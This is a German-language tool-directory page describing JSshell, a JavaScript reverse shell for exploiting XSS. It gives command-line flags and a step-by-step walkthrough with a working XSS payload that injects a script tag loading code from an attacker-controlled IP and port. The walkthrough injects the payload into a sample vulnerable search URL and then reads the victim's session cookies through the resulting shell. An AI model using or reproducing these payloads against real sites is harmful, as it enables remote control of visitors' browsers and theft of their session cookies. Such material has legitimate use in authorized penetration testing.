Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
JSshell — JSshell - JavaScript Reverse/Remote Shell | Kitploit
Tools/GitHubGitHub/shelld3v/jsshell
Payload-GenerierungWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubshelld3v/jsshell

JSshell

JSshell - JavaScript Reverse/Remote Shell

Repository anzeigen
6311102vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

JSshell - Version 3.1

JSshell

JSshell - eine JavaScript Reverse Shell. Dies wird verwendet, um JS-Code remote auszuführen, blindes XSS auszunutzen, ...

Voraussetzungen: Beliebiges Betriebssystem + Python 2 oder Python 3

Neu in JSshell Version 3.1

Aktualisiert in der neuen Version von JShell 3.1:

  • Neuer JSshell-Befehl: snippet -> ermöglicht das Schreiben eines JavaScript-Code-Snippets
root@kitploit:~
>>> snippet
Use CTRL+D to finish the snippet

function new() {
    new = 'New update: Support javascript snippet =)';
    confirm(new)
}

new()
>>> 
  • Ruhemodus (für Profis)
  • Reverse-Shell-Payload für <body> hinzugefügt
  • Einige Fehler behoben

Verwendung

JS-Reverse-Shell-Payloads generieren: -g

Lokale Portnummer für das Abhören und Generieren von Payloads festlegen (Standard: 4848):

Tool herunterladen
-p

Lokale Quelladresse für das Generieren von Payloads festlegen (Standard: automatische Erkennung Ihrer IP-Adresse): -s

Timeout für die Shell-Verbindung festlegen (wenn der Benutzer die Sitzung beendet, wird die Shell für immer angehalten; wenn Sie also ein Timeout festlegen, wird die Shell nach Überschreiten des Timeouts geschlossen): -w

Einen Befehl nach Erhalt der Shell ausführen: -c

Beispielanwendungen:

  • jsh.py
  • jsh.py -g
  • jsh.py -p 1234
  • jsh.py -s 48.586.1.23 -g
  • jsh.py -c "alert(document.cookie)" -w 10

Ein Beispiel für die Ausführung von JSshell:

Dies ist ein Schritt-für-Schritt-Beispiel zur Verwendung von JSshell.

Zuerst müssen wir einen Reverse-JS-Shell-Payload generieren und das Shell-Timeout festlegen (z.B. 20 Sekunden):

root@kitploit:~
~# whoami
root
~# ls
README.md   jsh.py
~# python3 jsh.py -g -w 20
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...

Fügen Sie diesen Payload nun auf der Website ein:

https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>

Rufen Sie die Seite auf und wir erhalten die Reverse-JS-Shell:

root@kitploit:~
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
$ established
$ the
$ shell
$
$
$ help
JSshell using javascript code as shell commands. Also supports some commands:
help                  This help
exit, quit            Exit the JS shell
$

Führen wir einige Befehle aus:

root@kitploit:~
$ var test = 'controlled'
$ confirm(test)
$

Und es erscheint ein Alert: controlled

root@kitploit:~
$ prompt(document.cookie)
$

Und der Browser gibt die Benutzer-Cookies aus: JSESSION=3bda8...

root@kitploit:~
$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#

Jetzt beendet!

Autor

Erstellt von shelld3v!